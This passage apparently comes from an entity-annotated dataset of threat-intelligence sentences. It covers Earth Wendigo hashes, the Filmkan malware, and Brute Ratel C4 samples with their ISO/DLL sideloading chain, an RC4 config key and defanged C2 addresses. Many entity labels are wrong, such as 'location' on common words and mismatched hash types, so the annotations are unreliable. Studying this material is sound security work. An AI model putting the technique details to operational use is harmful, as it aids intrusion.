50f23b6f4dff77ce4101242ebc3f12ea40156a409a7417ecf6564af344747b76 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C fab0c4e0992afe35c5e99bf9286db94313ffedc77d138e96af940423b2ca1cf2 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 4d9c63127befad0b65078ccd821a9cd6c1dccec3e204a253751e7213a2d39e39 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 25258044c838c6fc14a447573a4a94662170a7b83f08a8d76f96fbbec3ab08e2 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 13952e13d310fb5102fd4a90e4eafe6291bc97e09eba50fedbc2f8900c80165f Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C ccb7be5a5a73104106c669d7c58b13a55eb9db3b3b5a6d3097ac8b68f2555d39 Earth Wendigo Shellcode Loader Trojan.Win64.WENDIGOE.A 40a251184bb680edadfa9778a37135227e4191163882ccf170835e0658b1e0ed Earth Wendigo Shellcode Loader Trojan.Win64.WENDIGOE.B 0d6c3cc46be2c2c951c24c695558be1e2338635176fa34e8b36b3e751ccdb0de Cobalt Strike Trojan.Win32.COBALT.SM Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[{"id":19254,"label":"threat-actor","start_offset":98,"end_offset":111},{"id":19255,"label":"threat-actor","start_offset":158,"end_offset":171},{"id":19256,"label":"threat-actor","start_offset":221,"end_offset":234},{"id":19257,"label":"threat-actor","start_offset":276,"end_offset":289},{"id":19258,"label":"threat-actor","start_offset":336,"end_offset":349},{"id":19259,"label":"threat-actor","start_offset":396,"end_offset":409},{"id":19260,"label":"threat-actor","start_offset":459,"end_offset":472},{"id":19261,"label":"threat-actor","start_offset":519,"end_offset":532},{"id":19262,"label":"threat-actor","start_offset":589,"end_offset":602},{"id":19263,"label":"threat-actor","start_offset":660,"end_offset":673},{"id":19264,"label":"threat-actor","start_offset":732,"end_offset":745},{"id":19265,"label":"SHA1","start_offset":750,"end_offset":814},{"id":19266,"label":"threat-actor","start_offset":816,"end_offset":829},{"id":19267,"label":"attack-pattern","start_offset":830,"end_offset":833},{"id":19268,"label":"SHA1","start_offset":871,"end_offset":935},{"id":19269,"label":"threat-actor","start_offset":937,"end_offset":950},{"id":19270,"label":"attack-pattern","start_offset":951,"end_offset":954},{"id":19271,"label":"SHA1","start_offset":992,"end_offset":1056},{"id":19272,"label":"threat-actor","start_offset":1058,"end_offset":1071},{"id":19273,"label":"attack-pattern","start_offset":1072,"end_offset":1075},{"id":19274,"label":"SHA2","start_offset":1113,"end_offset":1177},{"id":19275,"label":"threat-actor","start_offset":1179,"end_offset":1192},{"id":19276,"label":"attack-pattern","start_offset":1193,"end_offset":1196},{"id":19277,"label":"SHA2","start_offset":1234,"end_offset":1298},{"id":19278,"label":"threat-actor","start_offset":1300,"end_offset":1313},{"id":19279,"label":"attack-pattern","start_offset":1314,"end_offset":1317},{"id":19280,"label":"SHA2","start_offset":1355,"end_offset":1419},{"id":19281,"label":"threat-actor","start_offset":1421,"end_offset":1434},{"id":19282,"label":"attack-pattern","start_offset":1435,"end_offset":1438},{"id":19283,"label":"SHA2","start_offset":1476,"end_offset":1540},{"id":19284,"label":"threat-actor","start_offset":1542,"end_offset":1555},{"id":19285,"label":"attack-pattern","start_offset":1556,"end_offset":1559},{"id":19286,"label":"MD5","start_offset":1597,"end_offset":1661},{"id":19287,"label":"threat-actor","start_offset":1663,"end_offset":1676},{"id":19288,"label":"attack-pattern","start_offset":1677,"end_offset":1680},{"id":19289,"label":"SHA2","start_offset":1718,"end_offset":1782},{"id":19290,"label":"threat-actor","start_offset":1784,"end_offset":1797},{"id":19291,"label":"attack-pattern","start_offset":1798,"end_offset":1801},{"id":19292,"label":"SHA2","start_offset":1839,"end_offset":1903},{"id":19293,"label":"threat-actor","start_offset":1905,"end_offset":1918},{"id":19294,"label":"attack-pattern","start_offset":1919,"end_offset":1922},{"id":19295,"label":"SHA2","start_offset":1960,"end_offset":2024},{"id":19296,"label":"threat-actor","start_offset":2026,"end_offset":2039},{"id":19297,"label":"attack-pattern","start_offset":2040,"end_offset":2043},{"id":19298,"label":"SHA2","start_offset":2081,"end_offset":2145},{"id":19299,"label":"threat-actor","start_offset":2147,"end_offset":2160},{"id":19300,"label":"attack-pattern","start_offset":2161,"end_offset":2164},{"id":19301,"label":"SHA1","start_offset":2202,"end_offset":2266},{"id":19302,"label":"threat-actor","start_offset":2268,"end_offset":2281},{"id":19303,"label":"attack-pattern","start_offset":2282,"end_offset":2285},{"id":19304,"label":"SHA1","start_offset":2323,"end_offset":2387},{"id":19305,"label":"threat-actor","start_offset":2389,"end_offset":2402},{"id":19306,"label":"attack-pattern","start_offset":2403,"end_offset":2406},{"id":19307,"label":"SHA1","start_offset":2444,"end_offset":2508},{"id":19308,"label":"threat-actor","start_offset":2510,"end_offset":2523},{"id":19309,"label":"attack-pattern","start_offset":2524,"end_offset":2527},{"id":19310,"label":"SHA2","start_offset":2565,"end_offset":2630},{"id":19311,"label":"threat-actor","start_offset":2632,"end_offset":2645},{"id":19312,"label":"SHA2","start_offset":2691,"end_offset":2755},{"id":19313,"label":"threat-actor","start_offset":2757,"end_offset":2770},{"id":19314,"label":"SHA1","start_offset":2826,"end_offset":2890},{"id":19315,"label":"threat-actor","start_offset":2892,"end_offset":2905},{"id":19316,"label":"SHA1","start_offset":2949,"end_offset":3013},{"id":19317,"label":"threat-actor","start_offset":3015,"end_offset":3028},{"id":19318,"label":"SHA2","start_offset":3072,"end_offset":3136},{"id":19319,"label":"threat-actor","start_offset":3138,"end_offset":3151},{"id":19320,"label":"SHA1","start_offset":3195,"end_offset":3259},{"id":19321,"label":"threat-actor","start_offset":3261,"end_offset":3274},{"id":19322,"label":"SHA1","start_offset":3320,"end_offset":3384},{"id":19323,"label":"threat-actor","start_offset":3386,"end_offset":3399},{"id":19324,"label":"SHA2","start_offset":3445,"end_offset":3509},{"id":19325,"label":"threat-actor","start_offset":3511,"end_offset":3524},{"id":19326,"label":"SHA1","start_offset":3570,"end_offset":3634},{"id":19327,"label":"threat-actor","start_offset":3636,"end_offset":3649},{"id":19328,"label":"SHA1","start_offset":3695,"end_offset":3759},{"id":19329,"label":"threat-actor","start_offset":3761,"end_offset":3774},{"id":19330,"label":"SHA2","start_offset":3820,"end_offset":3884},{"id":19331,"label":"threat-actor","start_offset":3886,"end_offset":3899},{"id":19332,"label":"SHA1","start_offset":3945,"end_offset":4009},{"id":19333,"label":"threat-actor","start_offset":4011,"end_offset":4024},{"id":19334,"label":"SHA1","start_offset":4070,"end_offset":4134},{"id":19335,"label":"tools","start_offset":4136,"end_offset":4149},{"id":19336,"label":"location","start_offset":4212,"end_offset":4215}],"relations":[],"Comments":[]} -{"id":6243,"text":"Based on the number of “likes” the malware had generated, Faghani estimated that over 100,000 users had been infected with the malware.","entities":[],"relations":[],"Comments":[]} -{"id":6247,"text":" Filmkan is very flexible, giving it more capability than simple interaction with social networks.","entities":[],"relations":[],"Comments":[]} -{"id":6250,"text":"Our WildFire analysis cloud first picked up samples of this malware on January 22 and thus far we’ve collected 44 distinct samples the display the behavior described by Faghani.","entities":[{"id":19368,"label":"tools","start_offset":4,"end_offset":12},{"id":19369,"label":"location","start_offset":22,"end_offset":27},{"id":19371,"label":"location","start_offset":82,"end_offset":85}],"relations":[],"Comments":[]} -{"id":6252,"text":"After a few seconds the video tells the user they need to download an update for Flash player, which is the initial dropper executable.","entities":[{"id":19378,"label":"TIME","start_offset":6,"end_offset":19}],"relations":[],"Comments":[]} -{"id":6254,"text":" The Filmkan dropper has a Flash icon to help make it appear as a legitimate update. The author of Filmkan created the dropper using AutoHotkey (AHK), a legitimate tool for creating Windows applications using a custom scripting language.","entities":[{"id":19383,"label":"location","start_offset":165,"end_offset":169},{"id":19384,"label":"attack-pattern","start_offset":219,"end_offset":228}],"relations":[],"Comments":[]} -{"id":6258,"text":" Chrome extensions allow developers to extend Google’s Chrome browser, typically by adding new functionality.","entities":[],"relations":[],"Comments":[]} -{"id":6264,"text":"The current version of the script contains three primary functions.","entities":[],"relations":[],"Comments":[]} -{"id":6271,"text":" When Faghani first published his analysis this component of the malware was forcing the user’s Facebook account to “like” specific posts on a community page titled Sabır.","entities":[{"id":19433,"label":"location","start_offset":143,"end_offset":152},{"id":19434,"label":"malware","start_offset":153,"end_offset":157}],"relations":[],"Comments":[]} -{"id":6278,"text":"Users should be suspicious of any message indicating that an update for Flash is available in Google Chrome, as Chrome contains an integrated Flash runtime that is updated by Google.","entities":[],"relations":[],"Comments":[]} -{"id":6279,"text":" Organizations should block access to the following domains to prevent Filmkan from receiving updates from the attacker.","entities":[],"relations":[],"Comments":[]} -{"id":6283,"text":"The Bash Uploader script allows its customers to send code coverage reports to the Codecov platform for analysis.","entities":[],"relations":[],"Comments":[]} -{"id":6289,"text":" Organizations using Codecov’s Bash Uploader script, or one of the other impacted tools should carefully evaluate their exposure to this threat.","entities":[],"relations":[],"Comments":[]} -{"id":6294,"text":"This post is also available in: 日本語 (Japanese) Unit 42 continuously hunts for new and unique malware samples that match known advanced persistent threat (APT) patterns and tactics.","entities":[{"id":19504,"label":"location","start_offset":5,"end_offset":9},{"id":19506,"label":"identity","start_offset":53,"end_offset":60},{"id":19507,"label":"location","start_offset":88,"end_offset":91},{"id":19508,"label":"location","start_offset":160,"end_offset":163},{"id":19509,"label":"location","start_offset":174,"end_offset":177}],"relations":[],"Comments":[]} -{"id":6297,"text":" The sample contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market.","entities":[{"id":19518,"label":"location","start_offset":5,"end_offset":11},{"id":19520,"label":"tools","start_offset":74,"end_offset":78},{"id":19521,"label":"location","start_offset":104,"end_offset":107},{"id":19522,"label":"location","start_offset":138,"end_offset":142},{"id":19523,"label":"identity","start_offset":146,"end_offset":149},{"id":19524,"label":"location","start_offset":154,"end_offset":160}],"relations":[],"Comments":[]} -{"id":6303,"text":"Additionally, pivoting on the certificate and other artifacts, we identified a total of 41 malicious IP addresses, nine BRc4 samples, and an additional three organizations across North and South America who have been impacted by this tool so far.","entities":[{"id":19542,"label":"location","start_offset":42,"end_offset":45},{"id":19545,"label":"tools","start_offset":120,"end_offset":124},{"id":19546,"label":"location","start_offset":134,"end_offset":137},{"id":19549,"label":"location","start_offset":234,"end_offset":238}],"relations":[],"Comments":[]} -{"id":6304,"text":" This unique sample was packaged in a manner consistent with known APT29 techniques and their recent campaigns, which leveraged well-known cloud storage and online collaboration applications.","entities":[{"id":19550,"label":"location","start_offset":13,"end_offset":19},{"id":19551,"label":"threat-actor","start_offset":67,"end_offset":72},{"id":19552,"label":"location","start_offset":84,"end_offset":87},{"id":19553,"label":"location","start_offset":139,"end_offset":144},{"id":19554,"label":"location","start_offset":153,"end_offset":156}],"relations":[],"Comments":[]} -{"id":6307,"text":"Attempts to execute the benign application from the ISO-mounted folder resulted in the loading of the malicious payload as a dependency through a technique known as DLL search order hijacking.","entities":[{"id":19559,"label":"attack-pattern","start_offset":165,"end_offset":191}],"relations":[],"Comments":[]} -{"id":6311,"text":" We encourage all security vendors to create protections to detect activity from this tool and all organizations to be on alert for activity from this tool. Palo Alto Networks customers receive protections from the threats described in this blog through Threat Prevention, Cortex XDR and WildFire malware analysis.","entities":[{"id":19580,"label":"location","start_offset":18,"end_offset":26},{"id":19581,"label":"location","start_offset":86,"end_offset":90},{"id":19582,"label":"location","start_offset":91,"end_offset":94},{"id":19583,"label":"location","start_offset":122,"end_offset":127},{"id":19584,"label":"location","start_offset":151,"end_offset":155},{"id":19587,"label":"location","start_offset":285,"end_offset":288},{"id":19588,"label":"malware","start_offset":289,"end_offset":297}],"relations":[],"Comments":[]} -{"id":6313,"text":"Shellcode","entities":[],"relations":[],"Comments":[]} -{"id":6315,"text":"Update Badger_x64.exe","entities":[],"relations":[],"Comments":[]} -{"id":6316,"text":"Employment","entities":[],"relations":[],"Comments":[]} -{"id":6319,"text":"At the time, its development was a part-time effort by a security engineer named Chetan Nayak (aka Paranoid Ninja) living in India.","entities":[{"id":19601,"label":"location","start_offset":7,"end_offset":11},{"id":19602,"label":"location","start_offset":40,"end_offset":44},{"id":19603,"label":"location","start_offset":45,"end_offset":51},{"id":19604,"label":"location","start_offset":57,"end_offset":65},{"id":19606,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} -{"id":6323,"text":"That same month, he released Brute Ratel v0.9.0 (Checkmate), which is described as the “biggest release for Brute Ratel till date.” However, of greater concern, the release description also specifically noted that “this release was built after reverse engineering several top tier EDR and Antivirus DLLs.” ","entities":[{"id":19626,"label":"location","start_offset":125,"end_offset":129},{"id":19627,"label":"attack-pattern","start_offset":245,"end_offset":264},{"id":19628,"label":"location","start_offset":286,"end_offset":289}],"relations":[],"Comments":[]} -{"id":6330,"text":"In terms of features, BRc4 advertises the following capabilities:","entities":[],"relations":[],"Comments":[]} -{"id":6331,"text":" The file in VirusTotal named Roshan_CV.iso (SHA256: 1FC7B0E1054D54CE8F1DE0CC95976081C7A85C7926C03172A3DDAA672690042C) appears to be a curriculum vitae (similar to a resume) of an individual named Roshan.","entities":[{"id":19663,"label":"SHA2","start_offset":53,"end_offset":117}],"relations":[],"Comments":[]} -{"id":6332,"text":"It was uploaded to VirusTotal on May 19, 2022, from Sri Lanka.","entities":[],"relations":[],"Comments":[]} -{"id":6343,"text":"The following table shows a side-by-side comparison of Roshan_CV.ISO and that of a previously identified APT29 sample (Decret.ISO).","entities":[{"id":19700,"label":"location","start_offset":69,"end_offset":72},{"id":19701,"label":"threat-actor","start_offset":105,"end_offset":110},{"id":19702,"label":"location","start_offset":111,"end_offset":117}],"relations":[],"Comments":[]} -{"id":6345,"text":"Figure 9 is a screenshot of the default Windows File Explorer; “show hidden files” is not checked.","entities":[],"relations":[],"Comments":[]} -{"id":6346,"text":"In both images, the user is presented with a shortcut file (LNK file) that starts the malicious activity when double-clicked.","entities":[],"relations":[],"Comments":[]} -{"id":6347,"text":" Figure 10 shows how the ISOs would appear when show hidden files” is enabled for viewing.","entities":[],"relations":[],"Comments":[]} -{"id":6348,"text":" The flow of execution is the following: Roshan_CV.ISO→Roshan-Bandar_CV_Dialog.LNK→cmd.exe→OneDriveUpdater.exe→version.dll→OneDrive.Update Decret.ISO→Decret.LNK→cmd.exe→HPScan.exe→version.dll→HPScanApi.dll ","entities":[],"relations":[],"Comments":[]} -{"id":6349,"text":"The delivery of packaged ISO files is typically sent via spear phishing email campaigns or downloaded to the victim by a second-stage downloader. While we lack insight into how this particular payload was delivered to a target environment, we observed connection attempts to the C2 server originating from three Sri Lankan IP addresses between May 19-20.","entities":[{"id":19706,"label":"attack-pattern","start_offset":57,"end_offset":71},{"id":19707,"label":"location","start_offset":156,"end_offset":160},{"id":19708,"label":"location","start_offset":221,"end_offset":227}],"relations":[],"Comments":[]} -{"id":6350,"text":" Version.dll is a modified version of a legitimate Microsoft file written in C++.","entities":[],"relations":[],"Comments":[]} -{"id":6356,"text":"The implanted code begins when the DLL is loaded via DLL_PROCESS_ATTACH and performs the following at the DLLMain subroutine: The technique outlined above uses process injection via undocumented Windows NTAPI calls.","entities":[{"id":19727,"label":"location","start_offset":72,"end_offset":75},{"id":19728,"label":"attack-pattern","start_offset":161,"end_offset":178}],"relations":[],"Comments":[]} -{"id":6357,"text":"The decrypted payload is now running within the runtimebroker.exe memory space.","entities":[],"relations":[],"Comments":[]} -{"id":6358,"text":"The following is a snippet of code from version.dll that starts the execution of the in-memory decrypted payload.","entities":[],"relations":[],"Comments":[]} -{"id":6361,"text":"The purpose of this is to copy the Brute Ratel C4 code (x64 assembly) onto the stack eight bytes at a time and eventually reassemble it into a memory space for execution – a DLL with a stripped MZ header.","entities":[{"id":19732,"label":"malware","start_offset":35,"end_offset":49},{"id":19733,"label":"location","start_offset":60,"end_offset":68},{"id":19734,"label":"location","start_offset":102,"end_offset":106},{"id":19735,"label":"location","start_offset":107,"end_offset":110}],"relations":[],"Comments":[]} -{"id":6364,"text":"When finished, the code performs the following.","entities":[],"relations":[],"Comments":[]} -{"id":6366,"text":"This data includes the encrypted configuration settings for Brute Ratel C4.","entities":[],"relations":[],"Comments":[]} -{"id":6368,"text":"The 16-byte RC4 decryption key is: bYXJm\/3#M?:XyMBF ","entities":[],"relations":[],"Comments":[]} -{"id":6369,"text":"The decrypted configuration file is: Each parameter is delineated with a pipe | character, and one of the values is the IP seen earlier of 174.129.157[.]251 and port of 443.","entities":[{"id":19748,"label":"location","start_offset":92,"end_offset":95},{"id":19749,"label":"location","start_offset":96,"end_offset":99},{"id":19750,"label":"IPV4","start_offset":140,"end_offset":157},{"id":19751,"label":"location","start_offset":158,"end_offset":161}],"relations":[],"Comments":[]} -{"id":6370,"text":"The IP 174.129.157[.]251 is hosted on Amazon AWS, and Palo Alto Networks Cortex Xpanse history shows the IP had TCP port 443 open from April 29, 2022, until May 23, 2022, with a self-signed SSL certificate impersonating Microsoft Security:","entities":[{"id":19752,"label":"IPV4","start_offset":7,"end_offset":24},{"id":19753,"label":"location","start_offset":50,"end_offset":53},{"id":19756,"label":"location","start_offset":190,"end_offset":193},{"id":19757,"label":"identity","start_offset":220,"end_offset":229},{"id":19758,"label":"location","start_offset":230,"end_offset":238}],"relations":[],"Comments":[]} -{"id":6371,"text":" Once the SSL handshake to IP 174.129.157[.]251 is complete, the following data is sent via HTTP POST to the Brute Ratel C4 listener port.","entities":[{"id":19759,"label":"location","start_offset":10,"end_offset":13},{"id":19760,"label":"IPV4","start_offset":30,"end_offset":47},{"id":19761,"label":"location","start_offset":97,"end_offset":101}],"relations":[],"Comments":[]} -{"id":6381,"text":"Example of badger_x64.exe:","entities":[],"relations":[],"Comments":[]} -{"id":6385,"text":" In this case, the sample is configured to communicate with IP 159.65.186[.]50 on TCP port 443.","entities":[{"id":19799,"label":"location","start_offset":9,"end_offset":13},{"id":19800,"label":"location","start_offset":19,"end_offset":25},{"id":19801,"label":"IPV4","start_offset":63,"end_offset":78}],"relations":[],"Comments":[]} -{"id":6388,"text":" After validating that badger_x64.exe and OneDrive.Update were both BRc4 payloads, we set to work analyzing the employment of this second sample.","entities":[{"id":19807,"label":"location","start_offset":38,"end_offset":41},{"id":19808,"label":"tools","start_offset":68,"end_offset":72},{"id":19810,"label":"location","start_offset":138,"end_offset":144}],"relations":[],"Comments":[]} -{"id":6390,"text":"Coincidentally, this happens to be one day after the ​​Roshan_CV.ISO file was uploaded.","entities":[],"relations":[],"Comments":[]} -{"id":6391,"text":"As noted above, the sample was configured to call home to 159.65.186[.]50 on port 443.","entities":[{"id":19815,"label":"location","start_offset":20,"end_offset":26},{"id":19816,"label":"location","start_offset":45,"end_offset":49},{"id":19817,"label":"location","start_offset":50,"end_offset":54},{"id":19818,"label":"IPV4","start_offset":58,"end_offset":73}],"relations":[],"Comments":[]} -{"id":6392,"text":"Palo Alto Networks Cortex Xpanse history shows that this port was open from May 21-June 18, 2022, with the same “Microsoft Security” self-signed SSL certificate seen above.","entities":[{"id":19823,"label":"location","start_offset":107,"end_offset":111},{"id":19824,"label":"identity","start_offset":113,"end_offset":122},{"id":19825,"label":"location","start_offset":123,"end_offset":131},{"id":19826,"label":"location","start_offset":145,"end_offset":148}],"relations":[],"Comments":[]} -{"id":6394,"text":"Evaluating netflow connections for 159.65.186[.]50 during this time window revealed several connections to ports 22, 443 and 8060 originating from a Ukrainian IP (213.200.56[.]105).","entities":[{"id":19831,"label":"IPV4","start_offset":35,"end_offset":50},{"id":19832,"label":"location","start_offset":63,"end_offset":67},{"id":19835,"label":"location","start_offset":121,"end_offset":124},{"id":19837,"label":"IPV4","start_offset":163,"end_offset":179}],"relations":[],"Comments":[]} -{"id":6396,"text":"A deeper look at connections in and out of 213.200.56[.]105 further revealed several flows over UDP port 33445.","entities":[{"id":19840,"label":"location","start_offset":32,"end_offset":35},{"id":19841,"label":"IPV4","start_offset":43,"end_offset":59},{"id":19842,"label":"location","start_offset":105,"end_offset":110}],"relations":[],"Comments":[]} -{"id":6398,"text":" Examining additional connections to port 443 on 159.65.186[.]50, we identified several suspected victims including an Argentinian organization, an IP television provider providing North and South American content, and a major textile manufacturer in Mexico.","entities":[{"id":19849,"label":"IPV4","start_offset":49,"end_offset":64},{"id":19852,"label":"location","start_offset":206,"end_offset":213},{"id":19853,"label":"location","start_offset":215,"end_offset":218},{"id":19854,"label":"location","start_offset":221,"end_offset":226}],"relations":[],"Comments":[]} -{"id":6399,"text":"Coincidentally, recent attempts to browse the textile manufacturer’s website result in a 500 internal server error message.","entities":[],"relations":[],"Comments":[]} -{"id":6400,"text":" Given the geographic dispersion of these victims, the upstream connection to a Ukrainian IP and several other factors, we believe it is highly unlikely that BRc4 was deployed in support of legitimate and sanctioned penetration testing activities.","entities":[{"id":19856,"label":"location","start_offset":1,"end_offset":6},{"id":19858,"label":"location","start_offset":93,"end_offset":96},{"id":19859,"label":"tools","start_offset":158,"end_offset":162},{"id":19860,"label":"location","start_offset":201,"end_offset":204}],"relations":[],"Comments":[]} -{"id":6403,"text":"Expanding our research beyond the two samples discussed above, we have also identified an additional seven samples of BRc4 dating back to February 2021.","entities":[{"id":19870,"label":"tools","start_offset":118,"end_offset":122}],"relations":[],"Comments":[]} -{"id":6406,"text":"The \"Brute Ratel C4 Tool Command and Control Traffic Detections\" signature is threat ID 86647.","entities":[],"relations":[],"Comments":[]} -{"id":6413,"text":"We believe it is imperative that all security vendors create protections to detect BRc4 and that all organizations take proactive measures to defend against this tool. Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":19895,"label":"location","start_offset":37,"end_offset":45},{"id":19896,"label":"tools","start_offset":83,"end_offset":87},{"id":19897,"label":"location","start_offset":88,"end_offset":91},{"id":19898,"label":"location","start_offset":162,"end_offset":166},{"id":19900,"label":"location","start_offset":238,"end_offset":241}],"relations":[],"Comments":[]} -{"id":6415,"text":"Learn more about the Cyber Threat Alliance.","entities":[],"relations":[],"Comments":[]} -{"id":6417,"text":"This impersonation does not imply a vulnerability in Microsoft’s products or services. Brute Ratel C4 ISO Samples: 1FC7B0E1054D54CE8F1DE0CC95976081C7A85C7926C03172A3DDAA672690042C X64 Brute Ratel C4 Windows Kernel Module: 31ACF37D180AB9AFBCF6A4EC5D29C3E19C947641A2D9CE3CE56D71C1F576C069 APT29 ISO Samples: F58AE9193802E9BAF17E6B59E3FDBE3E9319C5D27726D60802E3E82D30D14D46 ","entities":[{"id":19912,"label":"SHA2","start_offset":117,"end_offset":181},{"id":19914,"label":"SHA2","start_offset":226,"end_offset":290},{"id":19915,"label":"threat-actor","start_offset":292,"end_offset":297},{"id":19916,"label":"SHA2","start_offset":312,"end_offset":376}],"relations":[],"Comments":[]} -{"id":6418,"text":"X64 Brute Ratel C4 Samples: 3ED21A4BFCF9838E06AD3058D13D5C28026C17DC996953A22A00F0609B0DF3B9 3AD53495851BAFC48CAF6D2227A434CA2E0BEF9AB3BD40ABFE4EA8F318D37BBE 973F573CAB683636D9A70B8891263F59E2F02201FFB4DD2E9D7ECBB1521DA03E DD8652E2DCFE3F1A72631B3A9585736FBE77FFABEE4098F6B3C48E1469BF27AA E1A9B35CF1378FDA12310F0920C5C53AD461858B3CB575697EA125DFEE829611 EF9B60AA0E4179C16A9AC441E0A21DC3A1C3DC04B100EE487EABF5C5B1F571A6 D71DC7BA8523947E08C6EEC43A726FE75AED248DFD3A7C4F6537224E9ED05F6F 5887C4646E032E015AA186C5970E8F07D3ED1DE8DBFA298BA4522C89E547419B Malicious DLLs: EA2876E9175410B6F6719F80EE44B9553960758C7D0F7BED73C0FE9A78D8E669 Malicious Encrypted Payloads: B5D1D3C1AEC2F2EF06E7D0B7996BC45DF4744934BD66266A6EBB02D70E35236E X.509 Cert SHA1s: 55684a30a47476fce5b42cbd59add4b0fbc776a3 66aab897e33b3e4d940c51eba8d07f5605d5b275 Infrastructure linked to X.509 Certs or Samples: 104.6.92[.]229 137.184.199[.]17 138.68.50[.]218 138.68.58[.]43 139.162.195[.]169 139.180.187[.]179 147.182.247[.]103 149.154.100[.]151 15.206.84[.]52 159.223.49[.]16 159.65.186[.]50 162.216.240[.]61 172.105.102[.]247 172.81.62[.]82 174.129.157[.]251 178.79.143[.]149 178.79.168[.]110 178.79.172[.]35 18.133.26[.]247 18.130.233[.]249 18.217.179[.]8 18.236.92[.]31 185.138.164[.]112 194.29.186[.]67 194.87.70[.]14 213.168.249[.]232 3.110.56[.]219 3.133.7[.]69 31.184.198[.]83 34.195.122[.]225 34.243.172[.]90 35.170.243[.]216 45.144.225[.]3 45.76.155[.]71 45.79.36[.]192 52.48.51[.]67 52.90.228[.]203 54.229.102[.]30 54.90.137[.]213 89.100.107[.]65 92.255.85[.]173 92.255.85[.]44 94.130.130[.]43 ds.windowsupdate.eu[.]org Hunting for APT29 Spear Phishing Using XDR - Palo Alto Networks Blog Cozy Smuggled Into The Box: APT29 Abusing Legitimate Software For Targeted Operations In Europe Trello From the Other Side: Tracking APT29 Phishing Campaigns New sophisticated email-based attack from NOBELIUM Updated July 6, 2022, at 9:30 a.m. PT.","entities":[{"id":19918,"label":"SHA2","start_offset":29,"end_offset":93},{"id":19919,"label":"SHA2","start_offset":94,"end_offset":158},{"id":19920,"label":"SHA2","start_offset":159,"end_offset":223},{"id":19921,"label":"SHA2","start_offset":224,"end_offset":288},{"id":19922,"label":"SHA2","start_offset":289,"end_offset":353},{"id":19923,"label":"SHA2","start_offset":354,"end_offset":418},{"id":19924,"label":"SHA2","start_offset":419,"end_offset":483},{"id":19925,"label":"SHA2","start_offset":484,"end_offset":548},{"id":19926,"label":"SHA2","start_offset":567,"end_offset":631},{"id":19927,"label":"SHA2","start_offset":664,"end_offset":728},{"id":19928,"label":"MD5","start_offset":749,"end_offset":789},{"id":19929,"label":"SHA1","start_offset":790,"end_offset":830},{"id":19930,"label":"IPV4","start_offset":882,"end_offset":896},{"id":19931,"label":"IPV4","start_offset":897,"end_offset":913},{"id":19932,"label":"IPV4","start_offset":914,"end_offset":929},{"id":19933,"label":"IPV4","start_offset":930,"end_offset":944},{"id":19934,"label":"IPV4","start_offset":945,"end_offset":962},{"id":19935,"label":"IPV4","start_offset":963,"end_offset":980},{"id":19936,"label":"IPV4","start_offset":981,"end_offset":998},{"id":19937,"label":"IPV4","start_offset":999,"end_offset":1016},{"id":19938,"label":"IPV4","start_offset":1017,"end_offset":1031},{"id":19939,"label":"IPV4","start_offset":1032,"end_offset":1047},{"id":19940,"label":"IPV4","start_offset":1048,"end_offset":1063},{"id":19941,"label":"IPV4","start_offset":1064,"end_offset":1080},{"id":19942,"label":"IPV4","start_offset":1081,"end_offset":1098},{"id":19943,"label":"IPV4","start_offset":1099,"end_offset":1113},{"id":19944,"label":"IPV4","start_offset":1114,"end_offset":1131},{"id":19945,"label":"IPV4","start_offset":1132,"end_offset":1148},{"id":19946,"label":"IPV4","start_offset":1149,"end_offset":1165},{"id":19947,"label":"IPV4","start_offset":1166,"end_offset":1181},{"id":19948,"label":"IPV4","start_offset":1182,"end_offset":1197},{"id":19949,"label":"IPV4","start_offset":1198,"end_offset":1214},{"id":19950,"label":"IPV4","start_offset":1215,"end_offset":1229},{"id":19951,"label":"IPV4","start_offset":1230,"end_offset":1244},{"id":19952,"label":"IPV4","start_offset":1245,"end_offset":1262},{"id":19953,"label":"IPV4","start_offset":1263,"end_offset":1278},{"id":19954,"label":"IPV4","start_offset":1279,"end_offset":1293},{"id":19955,"label":"IPV4","start_offset":1294,"end_offset":1311},{"id":19956,"label":"IPV4","start_offset":1312,"end_offset":1326},{"id":19957,"label":"IPV4","start_offset":1327,"end_offset":1339},{"id":19958,"label":"IPV4","start_offset":1340,"end_offset":1355},{"id":19959,"label":"IPV4","start_offset":1356,"end_offset":1372},{"id":19960,"label":"IPV4","start_offset":1373,"end_offset":1388},{"id":19961,"label":"IPV4","start_offset":1389,"end_offset":1405},{"id":19962,"label":"IPV4","start_offset":1406,"end_offset":1420},{"id":19963,"label":"IPV4","start_offset":1421,"end_offset":1435},{"id":19964,"label":"IPV4","start_offset":1436,"end_offset":1450},{"id":19965,"label":"IPV4","start_offset":1451,"end_offset":1464},{"id":19966,"label":"IPV4","start_offset":1465,"end_offset":1480},{"id":19967,"label":"IPV4","start_offset":1481,"end_offset":1496},{"id":19968,"label":"IPV4","start_offset":1497,"end_offset":1512},{"id":19969,"label":"IPV4","start_offset":1513,"end_offset":1528},{"id":19970,"label":"IPV4","start_offset":1529,"end_offset":1544},{"id":19971,"label":"IPV4","start_offset":1545,"end_offset":1559},{"id":19972,"label":"IPV4","start_offset":1560,"end_offset":1575},{"id":19974,"label":"location","start_offset":1603,"end_offset":1610},{"id":19975,"label":"threat-actor","start_offset":1615,"end_offset":1620},{"id":19976,"label":"attack-pattern","start_offset":1621,"end_offset":1635},{"id":19977,"label":"identity","start_offset":1648,"end_offset":1666},{"id":19978,"label":"threat-actor","start_offset":1700,"end_offset":1705},{"id":19979,"label":"location","start_offset":1761,"end_offset":1767},{"id":19980,"label":"threat-actor","start_offset":1805,"end_offset":1810},{"id":19981,"label":"attack-pattern","start_offset":1811,"end_offset":1819},{"id":19984,"label":"TIME","start_offset":1907,"end_offset":1919}],"relations":[],"Comments":[]} -{"id":6424,"text":"We believe (with moderate confidence) that this newly identified activity is connected to MuddyWater (also known as TEMP.Zagros, Static Kitten, 